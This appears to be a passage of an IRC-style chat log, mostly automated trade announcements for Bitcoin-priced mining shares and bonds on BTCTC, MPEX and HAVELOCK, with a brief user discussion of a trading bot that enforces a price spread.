BTC [+] Jul 18 10:06:43 [BTCTC] [ASICMINER-PT] 1 @ 4.4594 BTC [+] Jul 18 10:06:45 [BTCTC] [ASICMINER-PT] 2 @ 4.4599 = 8.9198 BTC [+] Jul 18 10:06:47 [BTCTC] [ASICMINER-PT] 1 @ 4.469899 BTC [+] Jul 18 10:06:48 [BTCTC] [ASICMINER-PT] 1 @ 4.4699 BTC [+] Jul 18 10:08:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.043095 = 0.1293 BTC [+] Jul 18 10:09:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.043095 BTC [+] Jul 18 10:10:50 [BTCTC] [ASICMINER-PT] 1 @ 4.465 BTC [-] Jul 18 10:10:51 [BTCTC] [ASICMINER-PT] 1 @ 4.469999 BTC [+] Jul 18 10:11:28 [BTCTC] [ASICMINER-PT] 3 @ 4.430011 = 13.29 BTC [-] Jul 18 10:11:30 [BTCTC] [ASICMINER-PT] 7 @ 4.43001 = 31.0101 BTC [-] Jul 18 10:12:21 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [-] Jul 18 10:12:23 [BTCTC] [ASICMINER-PT] 1 @ 4.410501 BTC [-] Jul 18 10:12:25 [BTCTC] [ASICMINER-PT] 1 @ 4.4105 BTC [-] Jul 18 10:12:31 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [+] Jul 18 10:12:49 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 18 10:13:03 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00393 = 0.0393 BTC [-] Jul 18 10:13:15 [MPEX] [S.MPOE] 7486 @ 0.00087943 = 6.5834 BTC [+] Jul 18 10:13:56 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [+] Jul 18 10:15:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.043092 BTC [-] Jul 18 10:16:21 [BTCTC] [ASICMINER-PT] 1 @ 4.410001 BTC [-] Jul 18 10:16:39 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [-] Jul 18 10:16:41 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [-] Jul 18 10:21:40 [BTCTC] [ASICMINER-PT] 1 @ 4.371001 BTC [-] Jul 18 10:23:15 [BTCTC] [AMC-PT] 8750 @ 0.0025 = 21.875 BTC [+] Jul 18 10:23:32 [BTCTC] [ASICMINER-PT] 1 @ 4.371 BTC [-] Jul 18 10:24:29 [BTCTC] [DMS.MINING] 11 @ 0.015987 = 0.1759 BTC [+] Jul 18 10:24:30 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [+] Jul 18 10:25:52 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 18 10:28:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.043087 = 0.0862 BTC [-] Jul 18 10:29:39 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [+] Jul 18 10:30:49 [BTCTC] [S.DICE-PT] 45 @ 0.00332 = 0.1494 BTC [-] Jul 18 10:32:22 [BTCTC] [S.MPOE-PT] 150 @ 0.000882 = 0.1323 BTC [+] Jul 18 10:32:29 [MPEX] [S.MPOE] 508 @ 0.00087943 = 0.4468 BTC [+] Jul 18 10:32:31 [MPEX] [S.MPOE] 4392 @ 0.00087851 = 3.8584 BTC [-] Jul 18 10:34:51 [BTCTC] [AMC-PT] 900 @ 0.0025 = 2.25 BTC [+] Jul 18 10:35:40 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 18 10:36:14 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 18 10:36:20 [BTCTC] [S.DICE-PT] 171 @ 0.00332 = 0.5677 BTC [-] Jul 18 10:36:54 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 18 10:37:15 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 18 10:38:38 [BTCTC] [COGNITIVE] 5 @ 0.774999 = 3.875 BTC [-] Jul 18 10:39:02 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 18 10:39:04 [MPEX] [S.MPOE] 1300 @ 0.0008802 = 1.1443 BTC [+] Jul 18 10:42:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.043084 BTC [-] Jul 18 10:42:28 [BTCTC] [AMC-PT] 17 @ 0.0025 = 0.0425 BTC [+] Jul 18 10:43:08 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 18 10:43:09 [BTCTC] [DMS.PURCHASE] 71 @ 0.039759 = 2.8229 BTC [+] Jul 18 10:45:57 [MPEX] [S.MPOE] 6187 @ 0.0008802 = 5.4458 BTC [+] Jul 18 10:46:28 [BTCTC] [S.DICE-PT] 2 @ 0.003429 = 0.0069 BTC [+] Jul 18 10:46:43 [BTCTC] [S.DICE-PT] 100 @ 0.003291 = 0.3291 BTC [-] Jul 18 10:48:59 [HAVELOCK] [SDSTM] 70 @ 0.0101 = 0.707 BTC [-] Jul 18 10:55:36 [BTCTC] [ASICMINER-PT] 1 @ 4.384 BTC [+] Jul 18 10:57:45 [BTCTC] [ASICMINER-PT] 1 @ 4.380001 BTC [-] Jul 18 10:57:50 [BTCTC] [AMC-PT] 1850 @ 0.0025 = 4.625 BTC [+] Jul 18 10:57:51 [BTCTC] [ASICMINER-PT] 5 @ 4.38 = 21.9 BTC [-] Jul 18 10:57:54 [BTCTC] [ASICMINER-PT] 1 @ 4.37222 BTC [-] Jul 18 10:57:56 [BTCTC] [ASICMINER-PT] 1 @ 4.370504 BTC [-] Jul 18 10:57:58 [BTCTC] [ASICMINER-PT] 1 @ 4.362 BTC [-] Jul 18 10:58:09 [BTCTC] [ASICMINER-PT] 6 @ 4.350008 = 26.1 BTC [-] Jul 18 10:58:23 [BTCTC] [ASICMINER-PT] 5 @ 4.350002 = 21.75 BTC [-] Jul 18 11:03:39 [MPEX] [S.MPOE] 4050 @ 0.00087994 = 3.5638 BTC [-] Jul 18 11:04:29 [BTCTC] [BASIC-MINING] 3 @ 0.700101 = 2.1003 BTC [-] Jul 18 11:07:01 [BTCTC] [ASICMINER-PT] 1 @ 4.350004 BTC [+] Jul 18 11:07:09 [BTCTC] [AMC-PT] 7 @ 0.0025 = 0.0175 BTC [+] Jul 18 11:08:42 [MPEX] [S.MPOE] 680 @ 0.0008802 = 0.5985 BTC [+] Jul 18 11:08:44 [MPEX] [S.MPOE] 13021 @ 0.0008838 = 11.508 BTC [+] Jul 18 11:10:15 [BTCTC] [AMC-PT] 1836 @ 0.0025 = 4.59 BTC [+] Jul 18 11:10:47 [BTCTC] [TAT.ASICMINER] 7 @ 0.042317 = 0.2962 BTC [-] Jul 18 11:10:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.042316 = 0.6347 BTC [-] Jul 18 11:12:55 [HAVELOCK] [AM1] 7 @ 4.4 = 30.8 BTC [-] Jul 18 11:14:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.043077 BTC [+] Jul 18 11:14:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.042278 = 0.1268 BTC [-] Jul 18 11:15:19 [BTCTC] [FIMB] 10 @ 0.0103 = 0.103 BTC [+] Jul 18 11:15:21 [BTCTC] [FIMB] 5 @ 0.0102 = 0.051 BTC [-] Jul 18 11:15:22 [BTCTC] [DMS.MINING] 50 @ 0.015988 = 0.7994 BTC [+] Jul 18 11:15:24 [BTCTC] [FIMB] 10 @ 0.0102 = 0.102 BTC [-] Jul 18 11:15:25 [BTCTC] [DMS.MINING] 84 @ 0.015989 = 1.3431 BTC [+] Jul 18 11:15:26 [BTCTC] [FIMB] 10 @ 0.0101 = 0.101 BTC [-] Jul 18 11:15:27 [BTCTC] [DMS.MINING] 11 @ 0.01599 = 0.1759 BTC [+] Jul 18 11:15:29 [BTCTC] [FIMB] 30 @ 0.01 = 0.3 BTC [-] Jul 18 11:15:30 [BTCTC] [FIMB] 5 @ 0.01 = 0.05 BTC [-] Jul 18 11:15:32 [BTCTC] [FIMB] 10 @ 0.01 = 0.1 BTC [-] Jul 18 11:15:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.042278 = 0.1268 BTC [-] Jul 18 11:15:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.042277 = 0.1691 BTC [-] Jul 18 11:15:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.042277 = 0.1268 BTC [-] Jul 18 11:15:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.042223 = 0.6333 BTC [-] Jul 18 11:15:51 [HAVELOCK] [AM100] 21 @ 0.041849 = 0.8788 BTC [-] Jul 18 11:15:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.042222 = 0.1267 BTC [-] Jul 18 11:15:53 [HAVELOCK] [AM100] 329 @ 0.04184999 = 13.7686 BTC [+] Jul 18 11:15:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.04222 = 0.0844 BTC [-] Jul 18 11:15:56 [BTCTC] [TAT.ASICMINER] 45 @ 0.0422 = 1.899 BTC [-] Jul 18 11:16:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.04212 = 0.4212 BTC [-] Jul 18 11:16:32 [BTCTC] [BASIC-MINING] 3 @ 0.700101 = 2.1003 BTC [-] Jul 18 11:17:01 [BTCTC] [BASIC-MINING] 10 @ 0.7001 = 7.001 BTC [-] Jul 18 11:17:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.0421 = 0.3368 BTC [-] Jul 18 11:17:33 [BTCTC] [BASIC-MINING] 6 @ 0.699 = 4.194 BTC [-] Jul 18 11:17:45 [BTCTC] [TAT.ASICMINER] 11 @ 0.0421 = 0.4631 BTC [-] Jul 18 11:18:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.0421 = 0.1263 BTC [-] Jul 18 11:19:09 [BTCTC] [ASICMINER-PT] 1 @ 4.438799 BTC [+] Jul 18 11:20:24 [BTCTC] [AMC-PT] 473 @ 0.0025 = 1.1825 BTC [+] Jul 18 11:20:54 [BTCTC] [BTC-BOND] 200 @ 0.009996 = 1.9992 BTC [+] Jul 18 11:21:13 [HAVELOCK] [AM1] 10 @ 4.4 = 44 BTC [-] Jul 18 11:21:25 [BTCTC] [BASIC-MINING] 9 @ 0.699 = 6.291 BTC [-] Jul 18 11:21:51 [HAVELOCK] [HIM] 9 @ 0.265 = 2.385 BTC [-] Jul 18 11:22:10 [HAVELOCK] [HIM] 2 @ 0.263 = 0.526 BTC [-] Jul 18 11:22:19 [HAVELOCK] [HIM] 1 @ 0.2602 BTC [-] Jul 18 11:22:27 [HAVELOCK] [HIM] 9 @ 0.26 = 2.34 BTC [-] Jul 18 11:22:33 [HAVELOCK] [HIM] 8 @ 0.259 = 2.072 BTC [-] Jul 18 11:22:48 [HAVELOCK] [HIM] 10 @ 0.251 = 2.51 BTC [-] Jul 18 11:23:01 [BTCTC] [BASIC-MINING] 2 @ 0.691 = 1.382 BTC [-] Jul 18 11:23:28 [BTCTC] [AMC-PT] 70 @ 0.0025 = 0.175 BTC [+] Jul 18 11:24:15 [HAVELOCK] [AM100] 14 @ 0.041849 = 0.5859 BTC [-] Jul 18 11:24:40 [HAVELOCK] [AM100] 6 @ 0.04184999 = 0.2511 BTC [+] Jul 18 11:24:47 [HAVELOCK] [AM100] 2 @ 0.04185 = 0.0837 BTC [+] Jul 18 11:24:49 [BTCTC] [AMC-PT] 12000 @ 0.0025 = 30 BTC [+] Jul 18 11:25:00 [HAVELOCK] [AM100] 2 @ 0.0419 = 0.0838 BTC [+] Jul 18 11:25:53 [HAVELOCK] [AM1] 2 @ 4.4 = 8.8 BTC [-] Jul 18 11:26:06 [BTCTC] [DMS.MINING] 6 @ 0.01599 = 0.0959 BTC [+] Jul 18 11:26:24 [BTCTC] [ASICMINER-PT] 1 @ 4.436 BTC [-] Jul 18 11:26:25 [BTCTC] [ASICMINER-PT] 1 @ 4.439997 BTC [+] Jul 18 11:26:27 [BTCTC] [ASICMINER-PT] 1 @ 4.445 BTC [+] Jul 18 11:26:28 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 18 11:26:38 [BTCTC] [DMS.MINING] 9 @ 0.015987 = 0.1439 BTC [-] Jul 18 11:26:48 [HAVELOCK] [HIM] 3 @ 0.25 = 0.75 BTC [-] Jul 18 11:26:55 [HAVELOCK] [HIM] 13 @ 0.231 = 3.003 BTC [-] Jul 18 11:27:01 [HAVELOCK] [HIM] 14 @ 0.23 = 3.22 BTC [-] Jul 18 11:27:13 [HAVELOCK] [HIM] 5 @ 0.1901 = 0.9505 BTC [-] Jul 18 11:27:16 [MPEX] [S.MPOE] 858 @ 0.0008838 = 0.7583 BTC [+] Jul 18 11:27:18 [MPEX] [S.MPOE] 9650 @ 0.00088506 = 8.5408 BTC [+] Jul 18 11:27:24 [HAVELOCK] [HIM] 5 @ 0.19 = 0.95 BTC [-] Jul 18 11:27:31 [HAVELOCK] [HIM] 30 @ 0.185 = 5.55 BTC [-] Jul 18 11:27:39 [HAVELOCK] [HIM] 10 @ 0.181 = 1.81 BTC [-] Jul 18 11:27:50 [HAVELOCK] [HIM] 57 @ 0.175001 = 9.9751 BTC [-] Jul 18 11:27:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.043075 = 0.2585 BTC [+] Jul 18 11:27:58 [HAVELOCK] [HIM] 70 @ 0.165 = 11.55 BTC [-] Jul 18 11:28:07 [HAVELOCK] [HIM] 30 @ 0.1635 = 4.905 BTC [-] Jul 18 11:28:21 [HAVELOCK] [HIM] 20 @ 0.146 = 2.92 BTC [-] Jul 18 11:29:58 [HAVELOCK] [AM1] 8 @ 4.4 = 35.2 BTC [-] Jul 18 11:32:00 [HAVELOCK] [AM100] 10 @ 0.041948 = 0.4195 BTC [+] Jul 18 11:32:06 [HAVELOCK] [AM100] 39 @ 0.04194888 = 1.636 BTC [+] Jul 18 11:32:14 [HAVELOCK] [AM100] 1 @ 0.041989 BTC [+] Jul 18 11:32:29 [HAVELOCK] [AM100] 6 @ 0.041989 = 0.2519 BTC [+] Jul 18 11:32:41 [HAVELOCK] [AM100] 1 @ 0.041989 BTC [+] Jul 18 11:32:51 [HAVELOCK] [AM100] 4 @ 0.041989 = 0.168 BTC [+] Jul 18 11:33:03 [HAVELOCK] [AM100] 1 @ 0.041989 BTC [+] Jul 18 11:33:11 [HAVELOCK] [AM100] 3 @ 0.041989 = 0.126 BTC [+] Jul 18 11:33:18 [HAVELOCK] [AM100] 1 @ 0.04199 BTC [+] Jul 18 11:33:26 [HAVELOCK] [AM100] 2 @ 0.041999 = 0.084 BTC [+] Jul 18 11:33:27 [HAVELOCK] [AM100] 54 @ 0.042 = 2.268 BTC [+] Jul 18 11:33:38 [HAVELOCK] [AM100] 2 @ 0.041999 = 0.084 BTC [-] Jul 18 11:33:51 [HAVELOCK] [AM100] 2 @ 0.042 = 0.084 BTC [+] Jul 18 11:33:58 [HAVELOCK] [AM100] 1 @ 0.041999 BTC [-] Jul 18 11:33:59 [HAVELOCK] [AM100] 4 @ 0.042 = 0.168 BTC [+] Jul 18 11:34:04 [HAVELOCK] [AM100] 1 @ 0.041999 BTC [-] Jul 18 11:34:11 [HAVELOCK] [AM100] 1 @ 0.042 BTC [+] Jul 18 11:34:13 [HAVELOCK] [AM100] 79 @ 0.042 = 3.318 BTC [+] Jul 18 11:34:20 [HAVELOCK] [AM100] 1 @ 0.042 BTC [+] Jul 18 11:34:42 [HAVELOCK] [AM100] 35 @ 0.042 = 1.47 BTC [+] Jul 18 11:38:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.043073 = 0.1292 BTC [-] Jul 18 11:39:36 [BTCTC] [TAT.VIRTUALMINE] 36 @ 0.004 = 0.144 BTC [+] Jul 18 11:41:04 [BTCTC] [TAT.ASICMINER] 3 @ 0.043072 = 0.1292 BTC [-] Jul 18 11:47:18 [BTCTC] [S.MPOE-PT] 1 @ 0.000882 BTC [+] Jul 18 11:47:47 [BTCTC] [AMC-PT] 261 @ 0.0025 = 0.6525 BTC [+] Jul 18 11:48:27 [BTCTC] [DMS.MINING] 30 @ 0.015003 = 0.4501 BTC [-] Jul 18 11:48:29 [BTCTC] [DMS.MINING] 5 @ 0.015002 = 0.075 BTC [-] Jul 18 11:50:28 [BTCTC] [AMC-PT] 610 @ 0.0025 = 1.525 BTC [+] Jul 18 11:51:38 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 18 11:53:03 [BTCTC] [S.DICE-PT] 2 @ 0.003299 = 0.0066 BTC [+] Jul 18 11:53:05 [BTCTC] [S.DICE-PT] 8 @ 0.003299 = 0.0264 BTC [+] Jul 18 11:53:45 hello guys... does anyone know about the bots operating on BTCTC Jul 18 11:53:45 ? Jul 18 11:55:07 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004029 BTC [+] Jul 18 11:58:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.042997 = 0.172 BTC [-] Jul 18 11:59:07 hello guys... does anyone know about the bots operating on BTCTC Jul 18 11:59:08 [BTCTC] [COGNITIVE] 7 @ 0.735003 = 5.145 BTC [-] Jul 18 11:59:42 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 18 12:00:05 what about them elchespirito Jul 18 12:00:32 [BTCTC] [TAT.ASICMINER] 15 @ 0.042997 = 0.645 BTC [-] Jul 18 12:00:35 [BTCTC] [COGNITIVE] 2 @ 0.735002 = 1.47 BTC [-] Jul 18 12:00:40 yea, so, these bots are basically disrupting the way some assets "are supposed" to work Jul 18 12:01:11 taub: how is that ok? Jul 18 12:01:22 [BTCTC] [AMC-PT] 28 @ 0.0025 = 0.07 BTC [+] Jul 18 12:01:24 [BTCTC] [COGNITIVE] 1 @ 0.73285 BTC [-] Jul 18 12:01:32 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [+] Jul 18 12:01:46 [BTCTC] [COGNITIVE] 1 @ 0.701001 BTC [-] Jul 18 12:01:47 [BTCTC] [COGNITIVE] 1 @ 0.701001 BTC [-] Jul 18 12:02:14 hu Jul 18 12:02:20 how are they supposed to work? Jul 18 12:02:29 I don't know about the bots but I'm interested Jul 18 12:02:31 [BTCTC] [COGNITIVE] 1 @ 0.701 BTC [-] Jul 18 12:02:33 [BTCTC] [COGNITIVE] 1 @ 0.701 BTC [-] Jul 18 12:02:34 [BTCTC] [COGNITIVE] 1 @ 0.7001 BTC [-] Jul 18 12:02:36 [BTCTC] [COGNITIVE] 1 @ 0.7 BTC [-] Jul 18 12:02:40 [BTCTC] [COGNITIVE] 4 @ 0.7 = 2.8 BTC [-] Jul 18 12:03:13 [BTCTC] [COGNITIVE] 1 @ 0.664 BTC [-] Jul 18 12:03:15 [BTCTC] [COGNITIVE] 1 @ 0.651001 BTC [-] Jul 18 12:03:26 [BTCTC] [S.DICE-PT] 1 @ 0.00342 BTC [+] Jul 18 12:04:08 yea Jul 18 12:04:08 so Jul 18 12:04:17 a clever man made a script Jul 18 12:04:43 and he buys anything 0.10 below his own price Jul 18 12:04:51 obviously his got money to invest Jul 18 12:05:30 if you are trying to sell a bit cheaper than him Jul 18 12:05:31 [HAVELOCK] [AM100] 28 @ 0.0419 = 1.1732 BTC [-] Jul 18 12:05:48 the bot places a bid lower than yours Jul 18 12:06:33 if you place a bid a lot cheaper than him, then it buys you and sells more expensive Jul 18 12:06:38 [HAVELOCK] [SDSTM] 2 @ 0.0101 = 0.0202 BTC [-] Jul 18 12:06:42 well nothing you can do Jul 18 12:06:47 just wait for a big enough order Jul 18 12:06:52 to come around to fill you both Jul 18 12:07:39 this is normal market behavior though, nothing out of the ordinary Jul 18 12:07:40 unfortunately, that's never going to happen Jul 18 12:07:43 he just happens to have more money Jul 18 12:07:46 the bot has a high update rate Jul 18 12:07:59 nope, these aren't usual stocks Jul 18 12:08:01 these are bonds Jul 18 12:08:09 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 18 12:08:20 bonds have a predictable price Jul 18 12:08:23 you could sell into a bid Jul 18 12:08:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00396 = 0.0396 BTC [-] Jul 18 12:09:13 but okay Jul 18 12:09:22 I don't think bond prices are all that predictable though Jul 18 12:09:41 tat.virtualmine the most predictable one Jul 18 12:10:01 fixed hash rate Jul 18 12:10:09 2 difficulty changes a month Jul 18 12:10:21 it is very predictable Jul 18 12:10:31 it's just a matter of how much lower it will go Jul 18 12:13:04 [BTCTC] [AMC-PT] 16 @ 0.002498 = 0.04 BTC [-] Jul 18 12:13:15 yea huh Jul 18 12:13:20 well the way it looks you can't do anything Jul 18 12:13:28 [BTCTC] [AMC-PT] 72 @ 0.002497 = 0.1798 BTC [-] Jul 18 12:13:31 the bot is enforcing a spread on the price that you have to play within Jul 18 12:14:23 what sizes is it trading? 1? Jul 18 12:15:41 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00396 = 0.0396 BTC [-] Jul 18 12:17:45 [MPEX] [S.MPOE] 9400 @ 0.00088604 = 8.3288 BTC [+] Jul 18 12:17:47 [MPEX] [S.MPOE] 97 @ 0.00088636 = 0.086 BTC [+] Jul 18 12:18:03 [MPEX] [S.MPOE] 2 @ 0.00088772 = 0.0018 BTC [+] Jul 18 12:18:15 [BTCTC] [S.DICE-PT] 3 @ 0.00342 = 0.0103 BTC [+] Jul 18 12:20:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00392 BTC [-] Jul 18 12:20:56 [BTCTC] [TAT.VIRTUALMINE] 23 @ 0.0039 = 0.0897 BTC [-] Jul 18 12:20:58 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.003827 = 0.0268 BTC [-] Jul 18 12:21:00 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003808 = 0.0381 BTC [-] Jul 18 12:21:01 [BTCTC] [TAT.VIRTUALMINE] 120 @ 0.003606 = 0.4327 BTC [-] Jul 18 12:21:02 [BTCTC] [TAT.VIRTUALMINE] 306 @ 0.003605 = 1.1031 BTC [-] Jul 18 12:21:06 [BTCTC] [TAT.VIRTUALMINE] 710 @ 0.0036 = 2.556 BTC [-] Jul 18 12:21:08 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00341 = 0.0171 BTC [-] Jul 18 12:21:10 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00341 = 0.0205 BTC [-] Jul 18 12:21:11 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00341 = 0.0341 BTC [-] Jul 18 12:21:15 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00341 = 0.0273 BTC [-] Jul 18 12:21:17 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00341 = 0.0273 BTC [-] Jul 18 12:21:19 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.00341 = 0.058 BTC [-] Jul 18 12:21:21 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00341 = 0.0273 BTC [-] Jul 18 12:21:23 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00341 = 0.0273 BTC [-] Jul 18 12:21:24 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00335 BTC [-] Jul 18 12:21:25 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00323 = 0.323 BTC [-] Jul 18 12:21:27 [BTCTC] [TAT.VIRTUALMINE] 298 @ 0.003215 = 0.9581 BTC [-] Jul 18 12:22:34 [BTCTC] [AMC-PT] 12 @ 0.002496 = 0.03 BTC [-] Jul 18 12:22:50 [BTCTC] [BASIC-MINING] 1 @ 0.786946 BTC [+] Jul 18 12:24:38 [BTCTC] [DMS.MINING] 2 @ 0.015002 = 0.03 BTC [-] Jul 18 12:24:40 [BTCTC] [DMS.MINING] 50 @ 0.015001 = 0.7501 BTC [-] Jul 18 12:24:42 [BTCTC] [DMS.MINING] 10 @ 0.015 = 0.15 BTC [-] Jul 18 12:24:44 [BTCTC] [DMS.MINING] 129 @ 0.015 = 1.935 BTC [-] Jul 18 12:25:33 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 18 12:25:45 [BTCTC] [DMS.MINING] 10 @ 0.01595 = 0.1595 BTC [+] Jul 18 12:26:27 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003899 = 0.039 BTC [+] Jul 18 12:26:51 [BTCTC] [GSDPT] 5 @ 0.003103 = 0.0155 BTC [-] Jul 18 12:27:23 taub: it's trading 10 at the time Jul 18 12:29:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.042991 BTC [-] Jul 18 12:30:12 [HAVELOCK] [AM100] 72 @ 0.0419 = 3.0168 BTC [-] Jul 18 12:31:29 [BTCTC] [MININGCO.ETF] 2 @ 1.91 = 3.82 BTC [-] Jul 18 12:31:31 [BTCTC] [MININGCO.ETF] 1 @ 1.9 BTC [-] Jul 18 12:34:45 okay, well I don't know what to tell you :) Jul 18 12:34:53 [BTCTC] [ASICMINER-PT] 2 @ 4.459974 = 8.9199 BTC [+] Jul 18 12:37:09 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [-] Jul 18 12:37:11 [BTCTC] [ASICMINER-PT] 6 @ 4.459965 = 26.7598 BTC [+] Jul 18 12:37:13 [BTCTC] [ASICMINER-PT] 4 @ 4.459974 = 17.8399 BTC [+] Jul 18 12:37:15 [BTCTC] [ASICMINER-PT] 13 @ 4.46 = 57.98 BTC [+] Jul 18 12:37:17 [BTCTC] [ASICMINER-PT] 2 @ 4.464999 = 8.93 BTC [+] Jul 18 12:37:19 [BTCTC] [ASICMINER-PT] 5 @ 4.469 = 22.345 BTC [+] Jul 18 12:37:21 [BTCTC] [ASICMINER-PT] 7 @ 4.46993 = 31.2895 BTC [+] Jul 18 12:37:22 [BTCTC] [ASICMINER-PT] 5 @ 4.46999 = 22.35 BTC [+] Jul 18 12:37:23 [BTCTC] [ASICMINER-PT] 7 @ 4.469997 = 31.29 BTC [+] Jul 18 12:37:25 [BTCTC] [ASICMINER-PT] 5 @ 4.48 = 22.4 BTC [+] Jul 18 12:37:26 [BTCTC] [ASICMINER-PT] 2 @ 4.487 = 8.974 BTC [+] Jul 18 12:37:28 [BTCTC] [ASICMINER-PT] 3 @ 4.487 = 13.461 BTC [+] Jul 18 12:37:29 [BTCTC] [ASICMINER-PT] 2 @ 4.489 = 8.978 BTC [+] Jul 18 12:37:31 [BTCTC] [ASICMINER-PT] 1 @ 4.4989 BTC [+] Jul 18 12:37:32 [BTCTC] [ASICMINER-PT] 2 @ 4.499 = 8.998 BTC [+] Jul 18 12:37:34 [BTCTC] [ASICMINER-PT] 5 @ 4.499999 = 22.5 BTC [+] Jul 18 12:37:36 [BTCTC] [ASICMINER-PT] 13 @ 4.5 = 58.5 BTC [+] Jul 18 12:37:37 [BTCTC] [ASICMINER-PT] 20 @ 4.5 = 90 BTC [+] Jul 18 12:37:38 [BTCTC] [ASICMINER-PT] 5 @ 4.5 = 22.5 BTC [+] Jul 18 12:37:40 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003897 = 0.039 BTC [-] Jul 18 12:37:41 [BTCTC] [ASICMINER-PT] 4 @ 4.5 = 18 BTC [+] Jul 18 12:37:43 [BTCTC] [ASICMINER-PT] 5 @ 4.55 = 22.75 BTC [+] Jul 18 12:37:45 [BTCTC] [ASICMINER-PT] 1 @ 4.597 BTC [+] Jul 18 12:37:46 [BTCTC] [ASICMINER-PT] 1 @ 4.597999 BTC [+] Jul 18 12:37:48 [BTCTC] [ASICMINER-PT] 43 @ 4.599999 = 197.8 BTC [+] Jul 18 12:37:49 [BTCTC] [ASICMINER-PT] 10 @ 4.6 = 46 BTC [+] Jul 18 12:37:51 [BTCTC] [ASICMINER-PT] 5 @ 4.6 = 23 BTC [+] Jul 18 12:37:52 [BTCTC] [ASICMINER-PT] 10 @ 4.6 = 46 BTC [+] Jul 18 12:37:53 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [+] Jul 18 12:37:55 [BTCTC] [ASICMINER-PT] 19 @ 4.63 = 87.97 BTC [+] Jul 18 12:37:57 [BTCTC] [ASICMINER-PT] 24 @ 4.639 = 111.336 BTC [+] Jul 18 12:37:58 [BTCTC] [ASICMINER-PT] 5 @ 4.65 = 23.25 BTC [+] Jul 18 12:38:00 [BTCTC] [ASICMINER-PT] 40 @ 4.6999 = 187.996 BTC [+] Jul 18 12:38:01 [BTCTC] [ASICMINER-PT] 1 @ 4.6999 BTC [+] Jul 18 12:38:03 [BTCTC] [ASICMINER-PT] 3 @ 4.69999 = 14.1 BTC [+] Jul 18 12:38:05 [BTCTC] [ASICMINER-PT] 50 @ 4.7 = 235 BTC [+] Jul 18 12:38:07 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 18 12:38:09 [BTCTC] [ASICMINER-PT] 10 @ 4.7 = 47 BTC [+] Jul 18 12:38:15 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 18 12:38:45 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003897 = 0.039 BTC [-] Jul 18 12:39:12 [BTCTC] [TAT.ASICMINER] 18 @ 0.042989 = 0.7738 BTC [-] Jul 18 12:39:30 [BTCTC] [COG.F] 1 @ 7 BTC [-] Jul 18 12:43:55 [BTCTC] [AMC-PT] 235 @ 0.0025 = 0.5875 BTC [+] Jul 18 12:46:22 [BTCTC] [BTC-BOND] 1 @ 0.009996 BTC [+] Jul 18 12:49:07 [BTCTC] [TAT.ASICMINER] 20 @ 0.042987 = 0.8597 BTC [-] Jul 18 12:50:58 [BTCTC] [TAT.ASICMINER] 50 @ 0.042988 = 2.1494 BTC [+] Jul 18 12:51:00 [BTCTC] 